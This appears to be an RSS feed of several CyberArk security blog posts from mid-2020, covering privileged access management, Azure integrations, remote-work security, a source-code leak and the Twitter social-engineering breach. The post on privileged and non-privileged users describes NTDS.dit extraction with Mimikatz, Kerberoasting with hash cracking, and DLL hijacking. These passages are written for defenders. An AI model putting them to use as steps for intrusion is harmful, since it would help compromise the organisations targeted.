It’s our mission to continue to improve security for our more than 6,000 customers as they digitally transform their business. This is what drives CyberArk to constantly innovate and drive toward finding new ways to reduce risk for these global organizations – all while delivering a superior user experience focused on improving productivity and creating new efficiencies that move their businesses forward.

We know the world is operating in dramatically new ways, but what hasn’t changed is the attack pathway, which consistently targets businesses’ most valuable assets.

Organizations can’t stop attacks if they don’t secure privileged access everywhere: in the cloud, on endpoint devices, in applications, within automated processes, and throughout the DevOps pipeline. What’s more, the security of privileged access needs to encompass a company’s remote employees, as well as all its supply chain partners – as well as their home-based workers.

We are proud of our accomplishments over the past year, which include new just-in-time access capabilities that complement broader least privilege strategies; Alero, our SaaS-based  remote user solution that combines Zero Trust access and biometric multi-factor authentication; as well as delivering the industry’s broadest portfolio of SaaS-based solutions for privileged access management. I am especially excited about executing on our vision for Identity Security, which  starts with Zero Trust and uses artificial intelligence to understand context and intent. This approach will help organizations dramatically reduce risk, while providing a seamless user experience that securely enables the business and supports any device, application or user — regardless of role or location.

In addition to the Magic Quadrant, Gartner also published a companion report, “2020 Critical Capabilities for Privileged Access Management,”2 that states, “Gartner has identified PAM as a top 10 security control, and the market continues to grow at a double-digit rate.”

We at CyberArk believe it’s important to continue to emphasize the importance of PAM as critical to organizations’ cybersecurity strategies and strategic risk management initiatives. This is true, now, more than ever before.

To learn more, download the full Gartner 2020 Magic Quadrant for Privileged Access Management report here: https://www.cyberark.com/gartner-mq-pam/

  • Gartner, Magic Quadrant for Privileged Access Management, Felix Gaehtgens, Abhyuday Data, Michael Kelley, 4 August 2020
  • Gartner, Critical Capabilities for Privileged Access Management, Michael Kelley, Felix Gaehtgens, Abhyuday Data, 4 August 2020

Gartner Disclaimers

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

]]>
Making Azure Cloud Environments Even More Secure with CyberArk https://www.cyberark.com/blog/making-azure-cloud-environments-even-more-secure-with-cyberark-3/ Tue, 04 Aug 2020 19:47:39 +0000 https://www.cyberark.com/?p=97619 Privileged Access Management for Microsoft Azure

A recent survey of technology executives at large firms showed that Microsoft Azure continues to be the most popular provider of public cloud services, even as Amazon leads the market overall in terms of revenue – a trend that appears to be holding. In the same survey, 66 percent of respondents predicted that they would be using Microsoft Azure three years down the line.

Last week, at Impact Live 2020, CyberArk shared new capabilities that developers, security teams and cloud architects can use to enhance the security of Azure cloud environments including:

Native Authentication for Microsoft Azure Workloads Requesting Secrets

Application workloads, containers and other apps running on Azure can natively authenticate to CyberArk’s secrets management solution. With CyberArk Application Access Manager or Conjur Open Source, applications running in Microsoft Azure that require credentials to, for example, access a database or other sensitive resource, can now natively authenticate to the secrets management platform.

The native authentication between the application and the secrets management solution, whether the enterprise or the open source version of CyberArk’s secrets management solution, use the underlying Managed Identity for Azure Resources from the Azure Active Directory. This authentication method is easier and more secure than storing an API Key for identification and most importantly eliminates the “secret zero” problem – the all too common challenge of needing a secret to get a secret.

Increased Flexibly Deploying CyberArk in Microsoft Azure and Multi-Cloud Environments

The recent release of CyberArk Privileged Access Security Solution v11.5 added capabilities to automate the deployment of CyberArk Vault environments in Azure and support multi-cloud and multi-region configurations options with Azure.

CyberArk customers can now automate the deployment of their primary and recovery vaults between AWS and Azure for improved performance and availability. For example, customers can choose to deploy their Primary Vault in Azure and their Disaster Recovery Vault in AWS.

CyberArk also supports automated deployment of vault environments across different regions and availability zones within the same cloud provider. Customers can deploy their Primary Vault and their Disaster Recovery Vault in different regions within the Azure global infrastructure. For example, customers could deploy their Primary Vault in one of Azure’s eastern US regions while deploying their Disaster Recovery Vault in Azure’s Western Europe region.

Credential Theft Detection for Microsoft Azure

In one of the keynotes at Impact 2020, CyberArk Vice Presidents of Product Management Karen Eldor and Yair Sade announced that CyberArk customers can now automatically detect the theft of Identity and Access Management (IAM) credentials that grant access to Azure environments.

One major theme of Impact was the idea that, in modern IT environments, all identities can become privileged under certain conditions. This is especially true in the cloud. All Azure IAM users – whether they are traditional privileged users, like IT admins, or standard workforce users (“non-privileged users”) – can potentially interact with sensitive resources after logging in to Azure environments with an IAM account. This makes Azure IAM credentials top targets for attackers.

CyberArk now addresses this challenge by detecting, alerting and automatically responding to potential compromise of IAM credentials. When suspected credential theft occurs, CyberArk automatically alerts the Security and Operations teams and rotates the credentials to remediate the situation.

As announced at Impact, upcoming versions of the CyberArk Privileged Access Security Solution will feature an Azure Resource Manager (ARM) template to automatically deploy these capabilities with the goal of accelerating deployment and simplifying administration. Extending threat analytics to detect and remediate other forms of privileged behavior in Azure is another key part of CyberArk’s roadmap.

CyberArk and Azure, Better Together

These new capabilities reflect our continued commitment to provide customers with more flexibility for how they deploy and run the CyberArk Privileged Access Security Solution in Azure, multi-cloud and hybrid environments, as well as to improve the security of Azure workloads and the resources they access

We continue to develop Azure capabilities and advance our partnership. For example, we help companies migrating their Windows server workloads to Azure get single pane visibility across their on-premises and cloud workloads. We support shared responsibility for security in the cloud from day one with a solution focused on protecting cloud access as well as human and non-human privileged users.

To learn more, visit the CyberArk Marketplace to get started with any of CyberArk’s integrations with Azure. If you missed Impact Live 2020, don’t worry – sign up for Impact Live on demand and check out “Securing Privileged Access in a Hybrid World.”

]]>
Are Current Work From Home Security Measures Enough? https://www.cyberark.com/blog/are-current-work-from-home-security-measures-enough/ Fri, 31 Jul 2020 18:03:31 +0000 https://www.cyberark.com/?p=99506

The COVID-19 pandemic has turned working from home from a perk to an everyday reality. These changes are permanent, and they require a new security perspective.

The chaos of the first few months of the COVID-19 pandemic required swift decision making and abrupt, earth-shaking changes to everything from the workplace to the grocery store. Although thoroughly disruptive, many of these changes – particularly in the case of a now largely remote workforce – were initially seen as temporary fixes. They would last a few weeks, perhaps, before things returned “to normal.”

We are now well aware that “normal” is not coming back.

Those reactive quick fixes are now the first steps towards permanent change. Earlier this year, the number of job postings on ZipRecruiter that offered work from home was 1.3%. Since March, that number has risen to 11.3% and will only keep rising. Major tech companies like Facebook and Twitter have even gone so far as to institute permanent work from home positions.

Because the pandemic moved so swiftly and upended companies on so many levels, many had little choice but to opt for speed over security. Getting an entire workforce set up to function remotely – if that were even an option for the company – meant that corners had to be cut.

According to the CyberArk Remote Work study, 77% of remote workers admit they are using personal devices to access corporate systems. An additional 66% are utilizing potentially vulnerable communications platforms like Zoom and Microsoft Teams for corporate work and collaboration. A small but not insignificant number (37%) still save important passwords in browsers on their “work” computers.

“As more organizations extend work-from-home policies for the long term,” says CyberArk CMO Marianne Budnik,” it’s important to capture lessons learned from the initial phases of remote work and shape future cybersecurity strategies that don’t require employees to make tradeoffs that could put their company at risk.”

The dust is settling and the long term view is coming into focus. The question now is, are companies actually doing enough to balance the convenience needed for remote work with the stringent protections required for corporate data?

Are IT Departments Doing Enough?

Perhaps the most confounded discovery from the CyberArk Remote Work study wasn’t that remote workers aren’t employing the strictest security measures, it’s the glaring discrepancy between the mindset shared by an overwhelming number of IT professionals, and the actual, tangible actions they have taken regarding WFH security.

During the first few months of the pandemic, some systems were exposed because developers made the conscious decision to opt for a friction-free experience over one that offered more security. The phenomenon known as “Zoombombing” was the most visible example – companies began wholesale adopting Zoom as their go-to meeting resource, only to find that nearly anyone could drop into a meeting with little or no barrier to access.

“Organizations of all kinds are facing an uptick in email-based threats, endpoint-security gaps and other problems as a result of the sudden switch to a fully remote workforce,” says William Altman, Senior Analyst at the Global Cyber Center of NYC, operated by SOSA. “It’s now more important than ever to consider both the security practitioner as well as ethical-hacker perspectives in order to stay secure, that’s what this is all about.”

Of the over 3,000 IT professionals in the U.S., UK, France, and Germany surveyed for the CyberArk study, 94% expressed confidence in their ability to secure a remote workforce.  However, only 40% have increased security protocols or made any other significant changes to their systems. Confidence will only get you so far, after all. The “attack surface” – the collective term for all the areas through which a system can be breached – has widened significantly for everyone during the pandemic. Resources are stretched and there are fewer centralized hubs for access.

Simply reducing the number of passwords your employees need through Single Sign-On authentication, or employing efforts such as Multi-factor AuthenticationApp Gateway, and other forms of device security management can help IT departments ensure stronger defenses without adding additional layers of friction to the sign on experience (and without taxing their already stretched resources). The timeline towards Zero Trust security has been accelerated, but there are still a lot of details to be worked out for most companies.

Everyone Has to Do Their Part

Even after adopting SSO or MFA practices, IT departments have not eliminated the threat of breach – because, to paraphrase the urban legend, the calls are coming from inside the house. In other words, if you can’t get your workers to change their habits, there’s only so much adding these backend security measures can do.

Work habits have changed, and it goes a lot deeper than just forgoing pants on a video conference. Something about being at home makes people relaxed – which is a good thing for their mental health, but not so good for security on their work devices. Leaving browsers open, letting children Google homework help, online shopping during a boring meeting — these habits can and do widen the attack surface even more.

“This forgetfulness when it comes to security can be especially true for those who are not used to working or learning at home: People working from home get easily distracted, especially if they are normally used to working in the office, and they will mix work with personal email and web browsing,” says Colin Bastable, CEO of security awareness training company Lucy Security.

If the confidence most IT departments feel about their ability to secure multiple devices isn’t backed up by a slight increase in friction at the access points — and focused and consistent education of how corporate devices need to be handled in the wild — then the new work from home reality should brace for even more cyberattacks than we’ve already seen.

One of the unintended consequences of the COVID-19 pandemic will likely be increased Zero Trust adoption that further embraces cloud services, reduces reliance on VPNs, and enables employees to truly work from anywhere with minimal disruption.

We have the confidence and know-how, we just need more action.

]]>
Source Code Leak Lesson: Secure Development Environments https://www.cyberark.com/blog/source-code-leak-lesson-secure-development-environments/ Fri, 31 Jul 2020 17:28:10 +0000 https://www.cyberark.com/?p=97318

Once again we are seeing how vulnerable and easily development environments can be exploited with the recent news of a massive trove of leaked code from 50+ enterprises across multiple industries, including tech, finance, retail, manufacturing, food and eCommerce. Tillie Kottman, a Swiss software developer, collected leaked code into a public GitLab repository that is accessible by anyone. So how did they get the source code of these major players? Most of it was found by scanning misconfigured DevOps applications and third-party sources.

Aside from the obvious intrusion a leak like this invokes, what makes it particularly alarming is the number of hard coded credentials that were exposed  Hard coded credentials are passwords, access keys and other types of secrets stored in the source code, sometimes even as plain text. Each of these credentials could be used by an attacker to gain a foothold on that company’s cloud, development environment or IT infrastructure and, potentially, lead to further data leaks or other cybersecurity nightmares.

Fortunately, there are some valuable lessons to be learned here:

  1. Hard Coded Credentials Are A Serious Risk

While it’s unclear if hard coded credentials played a role in making the leak possible, the leak certainly made those credentials available to anyone who might visit GitLab. This would make it extremely easy for a cyber attacker to steal passwords and other secrets and potentially start using them to gain privileged access to any of these companies’ IT infrastructure. Some of the companies involved in the data leak also hard coded their cloud access keys, which would allow a cyber attacker to takeover a company’s cloud environment or steal sensitive information the company has on the cloud.

  1. Developers Need to Take Security Seriously

Some of the developers contacted about the code leak weren’t concerned about their code being exposed. This unfortunate example highlights a key issue: some developers are less concerned about security than they should be. But exposed code can quickly lead to big problems – like this data leak – and that’s a risk worth taking seriously.

Consider: even before this trove of source code was found and shared on GitLab, it was unprotected and available to attackers. Not only could those attackers use the code to steal intellectual property and potentially any hardcoded credentials or cloud access keys, they could get way more creative. For example, an attacker that can access the code could also add their own malicious code into automated builds and include it in the organizations code base.

  1. Protecting Code Repositories Is Really Important

The only information currently known about the origin of the source code is that it was found by scanning third-party sources and misconfigured DevOps applications. –However, is likely that at least some code was taken from a repository. After all, code repositories are established as an essential part of the modern development process. It’s a familiar scenario. The developers who created the leaked source code probably thought they were putting code into a private repository – but that wasn’t the case.

Either that code was inadvertently made public or a misconfiguration or stolen credential was used to expose it – which is an easy mistake, but a dangerous one. It’s essential to not only make sure the repository is correctly configured, but also to protect the credentials used by the developers to access and configure the repository.

  1. Bring Developers and Security Teams Together to Secure DevOps Environments

It’s not exactly a surprise that poorly protected DevOps tools and applications – and access to those tools – contributed to this leaked code.  The trend toward greater independence for developers has introduced risks and cultural changes that create clear security challenges. Specifically, the responsibility for managing risk in development environments is too often shifting from IT and security teams to development and DevOps teams.

In today’s high velocity developer culture, low-security shortcuts often flourish and traditional security processes are not always easy to integrate. To secure developers without slowing them down, the security team must work with their developer and DevOps counterparts to follow cybersecurity best practices. The goal is to find the right balance of securing the development environments while not overburdening developers. With developers and security teams working together, it’s much harder for something like this code leak to happen to you.

Next Steps

If organizations learn nothing else from this leak, they should learn that security can’t – and shouldn’t – be separated from development. The use of security best practices might have prevented these companies from having their credentials exposed in a public repository – and the potential leaks, breaches and takeovers that it could lead to. Adding security into the development process after the fact can be difficult and disruptive. Instead, involve security right from the beginning to keep credentials and repositories secure.

To find out more about how to address these issues, check out the CISO View – Securing Privileged Credentials in DevOps and Cloud Environments for insights from 13 global 2000 CISOs on how they have worked within their organizations to secure their DevOps environments. Or watch a video animation or read a white paper on the vulnerabilities exposed by development environments and why it is so critical for organizations to secure their development environments.

]]>
7 Best Practices for Securely Enabling Remote Work https://www.cyberark.com/blog/7-best-practices-for-securely-enabling-remote-work/ Thu, 30 Jul 2020 14:30:18 +0000 https://www.cyberark.com/?p=97286 Privileged Access Management

At Impact Live 2020 we spent a lot of time discussing strategies for maintaining a strong cybersecurity posture in the age of remote work. Today’s users need flexibility to do their jobs efficiently with the ability to access business systems at any time and in any place. However, with this new way of working, comes new security challenges – and those challenge require modern solutions.

Here are seven best practices to help remote workers stay productive and secure without adversely affecting operations or established business practices.

  1. Deploy Single Sign-On (SSO) and Multi-Factor Authentication (MFA.) With SSO, you can leverage a central identity provider to manage user authentication and grant access to applications and resources through a single set of login credentials. This enables you to improve security through stronger password policies, increase productivity with simplified access to all the resources employees need to do their jobs and make it easier for your IT department to meet compliance requirements around access. MFA adds an additional layer of protection to corporate resources. With MFA, you can firmly establish  that users are who they say they are by requiring them to pass multiple authentication challenges. For example, you can ask users to provide something they know – such as a password – and something they have – such as a one-time code sent to their mobile devices. You can use MFA to secure access to applications, workstations, virtual desktops, VPNs and more. ​For users who aren’t connecting from directly within the corporate network, MFA is essential for preventing the use of compromised credentials to access protected resources.
  2. Implement least privilege on endpoints to protect sensitive data and applications. Only providing end users and administrators with the absolute minimum levels of privileged access they require (a.k.a. the principle of least privilege) dramatically reduces the attack surface. One way of achieving this is to strip away unneeded local administrator rights from workstations to prevent endpoints from becoming compromised and enabling lateral movement. This reduces the risk of malware or ransomware being introduced to the environment, which can then be easily spread. ​
  3. Block RDP exposure from workstations. Remote Desktop Protocol (RDP) exposure has been at the root of many high-profile breaches – especially since workforces have become increasingly remote. Isolating sessions reduces the potential for endpoints – historically the weakest links of network access – to expose critical systems. Additionally, layering in the automatic recording of each session with behaviors analyzed in real-time helps  quickly detect and remediate suspicious behavior if and when it arises.  ​
  4. Reduce the overall reliance VPNs. The surge of remote work introduced a dramatic uptick in VPN usage. In a recent survey from CyberArk, 63% of employees reported using VPNs to access critical business systems. Attackers have long targeted VPNs because they provide access to the entire internal network. VPNs are distinctly not designed to provide granular access to critical systems and applications and can take a long time to set up. These tools often take s so much manual work to set up and operationalize that it takes away from the real goal at hand for security teams – reducing risk​.
  5. Set up policy to either allow, block or restrict applications. In the age of remote work, unnecessary calls to the help desk are skyrocketing. With allow/block/restrict policies, administrators can enable remote users to access the systems that they require for their jobs without any additional hassles. ​ Another way of reducing help desk calls is to enable users to access trusted apps without needing to call the helpdesk. This frees up IT resources to focus on more strategic intiaitves while also helping end users more efficiently and effectively do their jobs.  ​
  6. Deploy self-service initiatives where applicable. Similar to the above, anything an organization can do to reduce unneeded help desk calls can be a massive time and labor saver. Establising MFA-protected self-service password reset and account unlocking enables end users to reset their own corporate passwords and unlock their own accounts. Self-service applications and server access requests further enable end users and remote vendors to make requests for access to applications, servers and other critical internal systems, enabling IT and management to approve access without filing helpdesk tickets. Self-service MFA enroll/replace allows end users to enroll new authenticators and replace and reset passwords. These capabilities also provide the ability for end users to replace lost or stolen ones without needing to file tickets. Finally, self service also introduces the ability to request access to applications or servers without adding load to the help desk.
  7. Provide just in time provisioning for third party users. The push to mobilize the workforce has also had a clear impact on the number of third party vendors that organizations rely on. These types of users present new challenges as they are not part of the company directory and can be challenging to manage and keep track of. You can dramatically reduce the attack surface by introducing solutions to automatically provision and deprovision access with a one-time onboarding process. This way vendors will have just-in-time access — just the access they need for just as long as they need it – without requiring manual work from security or IT administrators to provision and revoke access to the attack surface.

Balancing security and convenience is a struggle for organizations in the age of remote work. With many employees working remotely with no end date in sight, the answer to this dilemma is more important than ever. By following these best practices, organizations can provide their remote workforce with secure access that doesn’t interfere with productivity or business practices.

Couldn’t make it to Impact Live? No problem. Sign up for Impact Live on demand to view all the sessions at your convenience.

]]>
The Blurring Line Between Privileged and Non-Privileged Users https://www.cyberark.com/blog/the-blurring-line-between-privileged-and-non-privileged-users/ Tue, 28 Jul 2020 16:42:44 +0000 https://www.cyberark.com/?p=97127 Privileged Access Management

“Identity truly  is the new perimeter” was one of the big topics  at Impact Live. This is because  organizations are dealing with a new set of operational and security challenges related to introducing more endpoints and  the reality of their workforce operating entirely remote for the indefinite future.

Consider this: in today’s world, to avoid user friction and not slow down productivity, it’s possible to elevate a non-privileged account (i.e. a standard business user on a Windows machine) to enable privileged access, so it isn’t enough to just consider the accounts that been granted privileges – they must be consistently monitored and managed. This creates a growing need to have controls in place to secure all identities – human and non-human – that have the potential to gain privileged access to critical systems and assets. It’s important to consider that this heightened level of access is exactly what attackers seek in their mission to disrupt a business or steal sensitive information.

At a deep technical level, let’s review three specific examples where a traditionally non-privileged user can gain privileged access.

Example 1: The Backup Administrator

The lifeblood of every organization is the data that it possesses. Whether its customer data, intellectual property, or financial reports and statements there needs to be a strategy in place for determining how that data is defined and managed for back up. Backup and recovery systems will help prevent data loss during an event and the backup admin is ultimately responsible for this inherently challenging task.

A backup admin, who only has access to permissions specifically pertaining to Backup and Recovery (BRS) systems, has the ability to take the archive and restore the NTDS.Dit file, which is a flat file representation of the Active Directory (AD) that is used in normal cases for system state recoveries. This file contains all AD objects, including accounts, passwords, keys and certificates, to name just a few.

Once the NTDS.Dit file has been extracted from the backup archive, a nefarious insider can then use tools like Mimikatz to extract all the hashes for all accounts in AD, which would include the KRBTGT account. The KRBTGT is essentially the signing account for all objects in AD and the main target for a DCSync attack. Once the KRBTGT is compromised, the attacker can then take that information back to the live environment and use the exported/cracked hashes to compromise that environment.

One of the worst aspects of this attack is that the attacker has all the time in the world to perform these activities undetected, since they can perform them outside of the corporate network where intrusion detection software or other security technology would not be a factor.

Figure 1. The malicious backup admin restores the NTDS.dit file from the backup server. From there they can pull it offline to crack the hashes (outside of the scope of any counter measure) and then bring it to the live environment.

If interested in learning more, you can see Keberoasting and other similar advanced attacks in action by attending the CyberArk PAM Summer Series.

Example 2: The Service Account

A service account is a non-human account that is often times used by an application or service to interact with the operating system to perform things like scheduled tasks. A big concern from a security perspective is the fact that the majority of organizations never perform an audit on their service accounts. Let’s look at the svc_sql account, which is created during an install of Microsoft SQL Server.

In this example, we will assume the attack originates from the outside and the attacker has gained an initial foothold into the organization from a compromised endpoint. To obtain credentials tied to the organization’s service accounts, the attacker can perform Kerberoasting, which takes advantage of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs). After the attacker dumps the Kerberoasting payload, a scan can be performed to determine the vulnerability of the service accounts in AD. Once enumerated, the attack would be performed on a specific account, which will return the hash of the SPN that was selected.

Once the hash has been obtained, it can be cracked utilizing the John the Ripper tool, returning the clear text value of the password. If no additional preventative measures have been taken to lock down interactive logons and place service accounts in an authorized hosts list, the attacker could interactively log into other hosts on the network as the service account. In this example, the attacker could now very easily compromise the Domain Controller by logging in as the svc_sql account. Game over.

Figure 2. [1] A TGT is requested with the NTLM hash provided; [2] The TGT is received with the encrypted KRBTGT hash; [3] TGS is requested for the server and is presented with the TGT; [4] The TGS encrypted with the server account hash is received by the server; [5] The TGS encrypted with the server account is presented for service and [6] it’s used when manual authentication is required.
Example 3: Dynamic Link Libraries (DLL)

DLLs are files loaded by Windows binaries that contain additional functionality that can be used to make programming within the Windows environment easier. Whenever an executable within Windows opens up or runs in some way, it will frequently attempt to load a DLL within the Windows environment.

Often times, the binary can attempt to load DLL’s that don’t exist due to a variety of reasons, such as older code not being removed. If this occurs within a directory that’s writeable by a non-privileged user and that binary is run as part of a service under an elevated context, an attacker can easily create a malicious DLL in its place, store it in that writeable directory and have it execute under the elevated context.

Moreover, even if the DLL does exist, an attacker can still hijack the execution flow. For example, if safe DLL search mode is enabled and the DLL that the binary is calling does not exist within its current directory, then, as long as the current directory is writeable, an attacker can install a malicious DLL there and have it run the next time the elevated service or program attempts to run.

Figure 3. An attacker places a malicious DLL within the executable’s own directory and the exe finds the malicious DLL first and loads that one, never reaching the legitimate one in the system directory.

From here, the attacker can elevate to whatever ‘context’ the user that executed the process was – in most cases this is the admin on the local machine. Not only was the account or permissions stolen, but the attacker could perform malicious activity under the guise of that admin. They can execute any arbitrary code they’d like to steal or delete data or establish persistence on the machine to monitor activities and perform reconnaissance. Local admin privileges on a machine also gives the attacker the ability to dump local passwords from the Local Security Authority Subsystem Service (LSASS), again using tools like Mimikatz to find additional domain credentials that could be used to perform lateral movement across the network.

Identity Security is the Future

CyberArk’s mission for Identity Security is to provide a SaaS-based Identity Security platform that offers secure access to any user accessing any application or system (from hybrid to multi-cloud) from anywhere and using any device.​ ​All types of access will be provided on a unified platform, leveraging artificial intelligence to automatically apply the needed privileged access security controls to each session based on the level of access that is required and the associated risk of the session.​

CyberArk’s investment in continuous innovation drives enhanced privileged access management capabilities across our portfolio, such as session isolation, session recording, continuous authentication and just-in-time access to the wider range of identities – whenever privileged access is required.

Want More From Impact Live?

Missed the event? No problem. Sign up for Impact Live on-demand to view all the recorded keynotes, breakout sessions and all other content from the original event.

 Many thanks to Len Noe, Asaf Hecht and Arash Parsa from CyberArk for their contributions to this blog.

]]>
What Twitter Attack Says on Human Nature, Social Engineering https://www.cyberark.com/blog/what-twitter-attack-says-on-human-nature-social-engineering/ Fri, 24 Jul 2020 12:00:50 +0000 https://www.cyberark.com/?p=96952 Social Engineering

Last week, Twitter suffered a breach that led to the compromise of numerous high-profile accounts, including those of Barak Obama, Joe Biden, Jeff Bezos and Elon Musk. I took the opportunity to speak with Nir Chako, Security Research Team Leader for CyberArk Labs and former Red Teamer, to get his breakdown on the attack.

While investigations are ongoing, Twitter reported it was the victim of a “coordinated social engineering attack.” The company confirmed that threat actors targeted and successfully manipulated a small group of employees and used their credentials to gain unauthorized access to an administrative tool that is “only available to internal support teams.”

According to Chako social engineering attacks like this one are “so effective because they use psychological manipulation to convince a person to take an action or divulge sensitive information that they shouldn’t. In fact, cyber attackers are the ultimate psychologists.”

Using these psychological tricks, the attackers were able to hijack Twitter accounts then post messages to dupe social media users into donating Bitcoin payments to fraudulent causes.

Originally thought to be the work of experienced nation-state attackers, it now appears the social engineering attack was conducted by a relatively unsophisticated group of hackers motivated solely by financial gain. Considering how powerful social media has become, their intentions, and corresponding global impact, could have been far worse.

The Twitter attack highlights the dangers of unsecured privileged access to critical applications, while reminding us how quickly any credential or identity can become privileged under certain conditions. If not properly secured, external attackers and malicious insiders alike can use them to unlock critical assets – currency, intellectual property, sensitive client records and more – causing irreparable harm to your business and reputation.

Social Engineering and the Human Opportunity

According to the 2020 Verizon DBIR, social engineering attacks keep increasing year-over-year. This makes sense since attackers nearly always look for the easiest point of entry. In most cases, social engineering techniques are a sure-fire way to get in the door. Wash. Rinse. Repeat.

In most cases, attackers utilize phishing emails to spoof their victims, developing highly customized messages that drive urgency or create fear. According to the 2020 DBIR, these social attacks arrive by email 96% of the time.

According to Chako, for attackers, “Every human represents an opportunity, no matter how strong their employer’s technological defenses may be. By targeting specific individuals, attackers can carefully study their behaviors, motivations, weaknesses – even their secrets – to build trust and credibility.”

Deconstructing the Twitter Attack

Chako provided me with his deconstruction of how the Twitter attack may have played out, explaining how the attackers successfully manipulated not one but two target victims: Twitter and the public at large. Below you’ll find his complete breakdown of the events.

PHASE 1

  1. Conduct Reconnaissance. The attackers likely searched social media profiles, like Twitter and LinkedIn, to pinpoint members of Twitter’s internal support team – specifically system admins that likely had access to the internal platform.
  2. Socially Engineer Twitter Employee(s). Using personal information gleaned from this reconnaissance work, the attackers successfully spoofed or coerced at least one Twitter employee and obtained their credentials.
  3. Gain Access to Target System. Using these credentials, the attackers were able to either directly access the internal admin platform OR use them to move laterally and escalate privileges until they could access the system. By using legitimate credentials, they were able to operate under the radar without being discovered.

 PHASE 2

  1. Compromise Twitter Accounts. With access to, and control of, the internal platform, the attackers targeted 130 accounts and successfully compromised 45 by changing their associated emails without notifying their owners. If multi-factor authentication (MFA) was in place on an account, the attackers likely disabled this security layer and then issued a password change, which was sent to the new email address.
  2. Socially Engineer the Twitterverse. With these newly issued passwords in hand, the attackers began posting from the compromised Twitter accounts. This time, they preyed on Twitter users who might see the messages and feel compelled (out of compassion, peer pressure, political leanings, sense of urgency, etc.) to donate Bitcoin – with the influential figure’s promise they would double the amount. Here’s what they posted to Joe Biden’s verified account, for example:
  3. Cash In. In just three hours, the fraudsters collected $118,000 in what the New York Times called “one of the most brazen online attacks in memory.”

Six Steps for Mitigating Risk of a Social Engineering Attack

Humans will always make mistakes and there’s no way to prevent social engineering attacks 100% of the time. The good news is there are specific steps your organization can take to significantly lower attackers’ success rates.

  1. Raise Awareness. Ongoing employee education and training on cybersecurity best practices – including how to spot a spoof – is a critical first step. Remember, urgent requests for payment or sensitive information should always raise red flags and require validation.
  2. Use Strong Passwords. As many employees continue to work from home, strong password policies are more important than ever. Start with the basics: Use strong passwords; don’t use them for multiple accounts; don’t share them and don’t save them in browsers.
  3. Prioritize Privileged Access Management (PAM). Privileged access is the route to your most critical assets. One of the best proactive ways to reduce risk is to implement strong PAM controls like the principle of least privilege to prevent credential theft, block lateral and vertical movement and stop privilege escalation and abuse. The Twitter attack should have every security leader asking right now: how are we identifying what our most critical systems, data and infrastructure are and who has access? Who is considered a privileged user (this includes business users) and what steps are we taking to manage, monitor and protect that access?
  4. Create a Conditional Access Policy That Mandates MFA. Based on Microsoft studies, an account is more than 99.9% less likely to be compromised if MFA is in place. Think of it this way: single factor authentication is a single point of failure. With conditional access, if a user wants to access a sensitive resource, then it must first perform MFA to reach it. This approach also helps organizations better balance security and user productivity.
  5. Use Dual Control Systems. No employee should have full access to sensitive platforms – your organization’s critical infrastructure – without multiple layers of security. Dual control means a duo is responsible for an action. For example, when a user tries to access a sensitive system, a request is created and must be confirmed by a second authorized user. It’s similar to the military’s “two-person concept,” designed to prevent malicious or accidental missile launches.
  6. Monitor and Respond to Anomalous Activity. By continuously monitoring privileged sessions and tapping analytics tools to automatically identify risky behavior or anomalous activity, your SOC team should be alerted immediately when something goes wrong – so you can respond fast.

The Twitter attack encapsulates the struggle many organizations have today: how to best secure the exploding number of credentials and identities that require privileged access to sensitive systems and data. There’s a critical need for a comprehensive approach to privileged access management that reduces risk, makes security teams’ lives easier by using automation wherever possible and empowers users to do their jobs as efficiently as possible.

Looking for more insights? Check out our Labs Team’s latest threat research and explore top-of-mind security vulnerabilities with our Red Team in this on-demand webinar.

]]>
A Look Back at the Impact Live 2020: Our Largest Impact Yet https://www.cyberark.com/blog/a-look-back-at-the-impact-live-2020-our-largest-impact-yet/ Thu, 23 Jul 2020 12:00:51 +0000 https://www.cyberark.com/?p=96930 Privileged Access Management and Identity Access Management

As our CyberArk team wraps up a banner week of Impact Live – the world’s largest gathering of privileged access management (PAM) and identity and access management (IAM) professionals – we’re reflecting back on the major themes, takeaways and “Impact-ful” moments from our 14th annual event.

Connecting Our Fast-Growing CyberArk Community 

This year, CyberArk Impact was reimagined in an immersive virtual format, enabling attendees from around the globe to join us from the comfort of their homes or offices. While we missed being together in person, we’re thrilled that our packed agenda of over 40 keynotes, breakout and training sessions reached more than 10,000 registered attendees – making this our largest Impact yet!

It was truly incredible to connect and engage with our expanding CyberArk community, helping security leaders and practitioners deepen their expertise and providing actionable insights on PAM and access management solutions and techniques to help them secure their business. If you couldn’t make it this year, tune in for on-demand content anytime!

Navigating the Cybersecurity Challenges of the New Normal

It’s safe to say that the demands on cybersecurity professionals have never been greater. Throughout Impact Live, we heard first-hand accounts of the formidable challenges teams are facing as they defend against unrelenting attacks, while racing to enable new work models. And if their jobs weren’t tough enough already, today’s “new normal” creates even more complexity and urgency. Consider that within a few short months:

  • Traditional infrastructure boundaries evaporated (practically overnight) when employees went home to work.
  • The attack surface expanded exponentially as organizations ramped up RDP use and cloud adoption spiked to enable remote work.
  • Risky security practices by remote employees made security teams’ jobs even harder. For example, 77% of remote employees admit to using insecure, unmanaged personal devices to access corporate systems and including installing corporate VPNs on personal devices.
  • While 80% of all data breaches stem from stolen or lost credentials, nearly all of them say they re-use the same passwords across applications and devices.
  • Two-thirds of people working from home adopted new collaboration tools like Zoom and Microsoft Teams, which reported significant security vulnerabilities.
  • Virtually every geography and industry experienced a sharp increase in opportunistic attacks. While many threat actors employed tried-and-true techniques, others launched new and dangerous attacks, including the MAZE ransomware that crippled some of the world’s largest organizations.

Fueling Our Continued Innovation

We are proud to have been called upon to help restore secure operations to a number of these impacted environments. CyberArk has been referred to as “the second call” in incident response scenarios. This is because comprehensive, centralized privileged access management controls are critical to helping breached organizations regain trust that their environment is secure. ​As our teams work side-by-side with remediation experts to understand attack patterns, methods and motivations, we’re continuously feeding these invaluable insights back into the products and services we develop.

That’s also why events like Impact Live are so important to us. The insights we gain from cybersecurity leaders on the front lines directly inform our view of the future and strengthen our confidence as we continue to innovate.

Exploring Three Major Themes from Impact Live

Throughout these ongoing conversations – and particularly this week – three resounding themes have emerged:

1. In today’s mobile, digital and cloud world, all identities can become privileged under certain conditions. If not properly secured, they can open doors for attackers – as evidenced by last week’s highly publicized cyber attack on Twitter.

